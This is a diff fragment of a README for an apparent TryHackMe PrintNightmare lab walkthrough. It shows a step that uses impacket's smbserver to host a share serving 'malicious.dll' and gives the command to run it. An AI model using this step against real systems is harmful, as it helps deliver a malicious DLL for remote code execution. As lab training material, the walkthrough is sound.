trixiahorner/printnightmare-try-hack-me/README.md

 <br>
 <br>
-5. To host the payload, we use smbserver (a tool from impacket).
+5. To host the payload, I use smbserver (a tool from impacket).
 This is the local folder that will share the malicious.dll. <i> *Make sure to run file share with smb2support to ensure compatibility and effectiveness* </i>

 ```
 smbserver.py share /root/Desktop/share/ -smb2support